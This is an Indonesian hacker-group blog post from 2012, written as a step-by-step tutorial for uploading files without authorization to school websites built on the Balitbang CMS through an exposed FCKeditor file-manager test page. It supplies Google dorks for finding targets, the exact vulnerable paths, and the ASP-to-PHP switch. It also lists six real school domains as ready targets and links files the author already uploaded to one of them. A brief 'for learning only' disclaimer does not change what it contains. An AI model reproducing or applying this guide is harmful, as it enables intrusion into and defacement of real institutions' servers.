2 CMS Balitbang File Upload, Sudah Lama Namun Masih Berlaku

Date: Jumat, Maret 30, 2012
Category:
Author: Indramayu Cyber Team
Share:
Responds: 2 Comment

Indramayu Cyber Team - Awalnya saya hanya berkunjung dan menjelajahi google untuk mencari web yang desainnya bagus dan keren. Karena saya hanya mengambil beberapa script saja dari web tersebut dan dari beberapa web yang menyediakan script gratis, untuk membuat desain web sendiri. Dan hasilnya lumayan untuk dipandang bagi sendiri, karena hasil dan kreasi sendiri. Tak beberapa lama kemudian, saya menjelajah lagi di google menemukan sesuatu yaitu tentang CMS Balitbang File Upload. Dan banyak sekali yang saya temukan di sana. Lalu saya mencoba mempelajari sendiri, dan ternyata saya pun bisa sendiri. sepertinya saya newbie banget.

Oke maksud artikel ini saya tulis bukan bertujuan untuk membuat kejahatan tetapi hanya pembelajaran saja bagi yang ingin mempelajarinya. Apabila hal ini terkait dengan yang bersangkutan, mohon maaf sebesar-besarnya. Saya hanya berbagi, bukan untuk berbuat kejahatan.

CMS ini dikembangkan oleh Balitbang Kemendiknas makanya lebih terkenal dengan sebutan CMS Balitbang. Balitbang ini ditunjukan untuk kepentingan dunia pendidikan Indonesia terutama untuk sekolah sekolah yang belum punya Website Sekolahnya. Harapannya kedepan Balitbang menginginkan semua sekolah di Indonesia punya Sistem Informasi Berbasis Website yang bisa diakses oleh banyak orang.

Oh ya, sebelumnya saya juga pernah nulis artikel berkaitan dengan CMS yaitu CMS Lokomedia yang sudah bebarapa hari yang lalu dan hampir satu minggu. Tetapi kali ini saya mencoba menjelaskan tentang CMS Balitbang. Tutorial ini sudah banyak di google, karena tutorial ini sudah lama namun masih berlaku. Maka dari itu saya menulis tutorial ini dan dikembangkan secara lengkap serta singkat tutornya tidak kebingungan untuk yang para newbie seperti saya. Langsung saya akan jelaskan lebih mudah.


Dork : inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"

Anda cari targetnya di google dengan kode diatas, atau langsung saja di klik link diatas dan langsung menuju ke google untuk mencarinya. Kalau sudah anda temukan web yang sekiranya pantas dan bisa dijadikan target, lalu masukan kode ini tepat dibelakang setelah nama alamat webnya.


editor/filemanager/connectors/uploadtest.html
editor/filemanager/connectors/test.html

Kalau anda tidak mengerti, contoh seperti ini.

http://www.target.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.target.sch.id/editor/filemanager/connectors/test.html

Setelah sudah, lalu pada options ASP diganti menjadi PHP. Kemudian anda boleh upload file tanpa harus izin dari admin webnya, file yang bisa diupload adalah 7z, aiff, asf, avi, bmp, csv, doc, fla, flv, gif, gz, gzip, jpeg, jpg, mid, mov, mp3, mp4, mpc, mpeg, mpg, ods, odt, pdf, png, ppt, pxd, qt, ram, rar, rm, rmi, rmvb, rtf, sdc, sitd, swf, sxc, sxw, tar, tgz, tif, tiff, txt, vsd, wav, wma, wmv, xls, xml, zip. Jika sudah diupload, file bisa anda temukan dengan cara klik Get Folders | Get Folders and Files atau contoh disini menggunakan TXT.


http://www.target.sch.id/userfiles/file/file.txt

Sekian tutor kali ini yang bisa saya bagikan untuk yang belum mengetahui atau ingin belajar saja. Jika anda malas mencari target, berikut ada beberapa target yang ada tempat buat uploadnya yang saya jumpai di mesin pencari.

http://www.sman1gombong.sch.id/editor/filemanager/connectors/test.html
http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.sman10samarinda.sch.id/editor/filemanager/connectors/test.html
http://www.smpn10tarakan.sch.id/editor/filemanager/connectors/test.html
http://sman6bdg.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html

Dan yang terakhir ada contoh dari saya untuk anda.

text => http://www.sman1gombong.sch.id/userfiles/file/imcyber-team.txt
image => http://www.sman1gombong.sch.id/userfiles/image/indramayucyberteam.jpg


artikel ini tidak sama persis dengan aslinya, karena yang asli lebih sulit untuk dipahami. Courtesy of exploit-db

Keyword: Mengganti Icon CMS Balitbang Kemendiknas

Enter your email address:

Delivered by FeedBurner


Artikel Terkait :



2 comments

01 April, 2012 19:10

Kunjungan balik sob,,, thanks dah berkunjung...

Anonim
10 April, 2012 19:58

Whaaa,..artikelnya keren gan. numpang sedot ya...

Posting Komentar